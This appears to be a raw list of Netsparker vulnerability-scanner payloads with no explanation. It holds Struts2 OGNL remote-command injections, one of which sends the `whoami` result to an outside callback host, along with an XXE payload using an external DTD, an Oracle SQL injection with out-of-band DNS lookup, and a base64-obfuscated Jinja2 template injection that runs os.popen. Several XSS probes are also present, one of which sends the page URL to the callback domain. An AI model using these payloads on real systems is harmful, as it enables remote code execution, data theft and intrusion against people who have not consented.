&ping -w 25 127.0.0.1 &

n3tsp4rke2

<scRipt>netsparker(0x035BDC)</scRipt>

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='13134').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

wezgh4e8eejxzsracoarlnegrpebx747fdzbvzludhm.r87.me

wezgh4e8eeget6u6u8fdttlipnvh3yqrauh5bybcxq4.r87.me

//wezgh4e8ee9khjoklsuzpg-it8cooeguhmn-vrzyl7m.r87.me

//wezgh4e8ee2fwxbzdty7jumf4e5detiyikivaxsr1go.r87.me

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://wezgh4e8"><!ENTITY % d "eekrhblpmyyfzumeckzaehq9qef7_psrmsy.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

http://wezgh4e8eefcsum49ppbs9-xpx2nnhpzw1r7ixvyumt.r87.me/p/

http://wezgh4e8eer3wswenyvlmlflozjza401jpwzkne9kad.r87.me/p/

wezgh4e8ee83xerl7t81qgku0ad57denjnefz2pmez7.r87.me/p/

wezgh4e8eec4w9dk7ecxjquga1kjdzhv4xbyugpll-n.r87.me/p/

(select UTL_INADDR.GET_HOST_ADDRESS(chr(119)||chr(101)||chr(122)||chr(103)||chr(104)||chr(52)||chr(101)||chr(56)||chr(101)||chr(101)||chr(104)||chr(104)||chr(112)||chr(120)||chr(97)||chr(57)||chr(100)||chr(117)||chr(106)||chr(55)||chr(101)||chr(51)||chr(95)||chr(98)||chr(95)||chr(102)||chr(120)||chr(116)||chr(98)||chr(108)||chr(109)||chr(112)||chr(106)||chr(112)||chr(98)||chr(119)||chr(99)||chr(112)||chr(107)||chr(117)||chr(97)||chr(122)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)

1 ns=netsparker(0x0360FF)

1 ns=netsparker(0x036100)

//r87.com/n/n.css?0x03610D

//r87.com/n/n.css?0x03610E

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."wezgh4e8eed8t0ofjrpt3hghobzpuq2xgeqaitqw""llm.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnZDJWNloyZzBaVGhsWlhOaFgzTmtaVGx0YVMwd05tbHFOamQzYjIxZk4zbDVkSGxsYW5wMFptSnNOQzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

netsparker(0x03626B)

netsparker(0x03626C)

'"@--></style></scRipt><scRipt>netsparker(0x03627B)</scRipt>

'"@--></style></scRipt><scRipt>netsparker(0x03627C)</scRipt>

//r87.com/?0x0362AA

//r87.com/?0x0362AB

';l=document.createElement("link");l.rel="prefetch";l.href="//wezgh4e8eeadi1xkgexjti3gssck_cfdnlwzz_5b"+"s-u.r87.me/r/?"+location.href;document.head.appendChild(l);//

<iframe src="//wezgh4e8eebbpwwnunupyerktuxorumjamh8ar_mhki&#46;r87&#46;me"></iframe>